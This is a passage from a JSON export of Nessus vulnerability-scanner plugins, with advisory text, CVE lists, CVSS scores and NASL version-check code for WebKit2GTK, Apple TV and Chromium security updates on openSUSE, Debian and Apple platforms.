x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T18:21:42", "description": "According to its banner, the version of Apple TV on the remote device is prior to 12.1.1. It is, therefore, affected by multiple vulnerabilities as described in the HT209342 security advisory:\n\n - Multiple elevation of privilege vulnerabilities exist due to improper memory handling. An application can exploit this to gain elevated privileges. (CVE-2018-4303, CVE-2018-4435)\n\n - Multiple unspecified command execution vulnerabilities exist that allow an attacker to execute arbitrary commands, sometimes with kernel privileges. (CVE-2018-4427, CVE-2018-4437, CVE-2018-4438, CVE-2018-4447, CVE-2018-4461, CVE-2018-4464, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - An unspecified denial of service (DoS) vulnerability exists in the Kernel that allows an an attacker in a privileged position to perform a denial of service attack. (CVE-2018-4460)\n\nAdditionally, the version of Apple TV is also affected by several additional vulnerabilities including cross-site scripting (XSS) and an information disclosure vulnerability.\n\nNote that only 4th generation devices are affected by these vulnerabilities.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-21T00:00:00", "type": "nessus", "title": "Apple TV < 12.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4303", "CVE-2018-4427", "CVE-2018-4431", "CVE-2018-4435", "CVE-2018-4436", "CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4447", "CVE-2018-4460", "CVE-2018-4461", "CVE-2018-4464", "CVE-2018-4465"], "modified": "2022-05-26T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_12_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/119839", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119839);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/26\");\n\n script_cve_id(\n \"CVE-2018-4303\",\n \"CVE-2018-4431\",\n \"CVE-2018-4435\",\n \"CVE-2018-4436\",\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4447\",\n \"CVE-2018-4460\",\n \"CVE-2018-4461\",\n \"CVE-2018-4464\",\n \"CVE-2018-4465\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-12-05-3\");\n\n script_name(english:\"Apple TV < 12.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 12.1.1. It is, therefore, affected by multiple\nvulnerabilities as described in the HT209342 security advisory:\n\n - Multiple elevation of privilege vulnerabilities exist due to\n improper memory handling. An application can exploit this to gain\n elevated privileges. (CVE-2018-4303, CVE-2018-4435)\n\n - Multiple unspecified command execution vulnerabilities exist that\n allow an attacker to execute arbitrary commands, sometimes with\n kernel privileges. (CVE-2018-4427, CVE-2018-4437, CVE-2018-4438,\n CVE-2018-4447, CVE-2018-4461, CVE-2018-4464, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443)\n\n - An unspecified denial of service (DoS) vulnerability exists in\n the Kernel that allows an an attacker in a privileged position to\n perform a denial of service attack. (CVE-2018-4460)\n\nAdditionally, the version of Apple TV is also affected by several\nadditional vulnerabilities including cross-site scripting (XSS) and\nan information disclosure vulnerability.\n\nNote that only 4th generation devices are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209342\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 12.1.1 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4465\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"16K45\";\ntvos_ver = '12.1.1';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T18:55:15", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2018-5179 Yannic Boneberger discovered an error in the ServiceWorker implementation.\n\n - CVE-2018-17462 Ned Williamson and Niklas Baumstark discovered a way to escape the sandbox.\n\n - CVE-2018-17463 Ned Williamson and Niklas Baumstark discovered a remote code execution issue in the v8 JavaScript library.\n\n - CVE-2018-17464 xisigr discovered a URL spoofing issue.\n\n - CVE-2018-17465 Lin Zuojian discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2018-17466 Omair discovered a memory corruption issue in the angle library.\n\n - CVE-2018-17467 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17468 Jams Lee discovered an information disclosure issue.\n\n - CVE-2018-17469 Zhen Zhou discovered a buffer overflow issue in the pdfium library.\n\n - CVE-2018-17470 Zhe Jin discovered a memory corruption issue in the GPU backend implementation.\n\n - CVE-2018-17471 Lnyas Zhang discovered an issue with the full screen user interface.\n\n - CVE-2018-17473 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17474 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2018-17475 Vladimir Metnew discovered a URL spoofing issue.\n\n - CVE-2018-17476 Khalil Zhani discovered an issue with the full screen user interface.\n\n - CVE-2018-17477 Aaron Muir Hamilton discovered a user interface spoofing issue in the extensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library included with chromium.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Debian DSA-4330-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-09T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4330.NASL", "href": "https://www.tenable.com/plugins/nessus/118719", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4330. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118719);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/09\");\n\n script_cve_id(\"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\", \"CVE-2018-5179\");\n script_xref(name:\"DSA\", value:\"4330\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Debian DSA-4330-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2018-5179\n Yannic Boneberger discovered an error in the\n ServiceWorker implementation.\n\n - CVE-2018-17462\n Ned Williamson and Niklas Baumstark discovered a way to\n escape the sandbox.\n\n - CVE-2018-17463\n Ned Williamson and Niklas Baumstark discovered a remote\n code execution issue in the v8 JavaScript library.\n\n - CVE-2018-17464\n xisigr discovered a URL spoofing issue.\n\n - CVE-2018-17465\n Lin Zuojian discovered a use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2018-17466\n Omair discovered a memory corruption issue in the angle\n library.\n\n - CVE-2018-17467\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17468\n Jams Lee discovered an information disclosure issue.\n\n - CVE-2018-17469\n Zhen Zhou discovered a buffer overflow issue in the\n pdfium library.\n\n - CVE-2018-17470\n Zhe Jin discovered a memory corruption issue in the GPU\n backend implementation.\n\n - CVE-2018-17471\n Lnyas Zhang discovered an issue with the full screen\n user interface.\n\n - CVE-2018-17473\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-17474\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2018-17475\n Vladimir Metnew discovered a URL spoofing issue.\n\n - CVE-2018-17476\n Khalil Zhani discovered an issue with the full screen\n user interface.\n\n - CVE-2018-17477\n Aaron Muir Hamilton discovered a user interface spoofing\n issue in the extensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library\nincluded with chromium.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-5179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17462\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17467\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17468\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17470\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17473\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17474\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17477\"\n );\n # https://security-tracker.debian.org/tracker/source-package/chromium-browser\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e33901a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4330\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 70.0.3538.67-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"70.0.3538.67-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:41", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-23T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2018-1208)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-1208.NASL", "href": "https://www.tenable.com/plugins/nessus/118317", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1208.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118317);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2018-1208)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware\n accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-70.0.3538.67-lp150.2.20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:25", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit 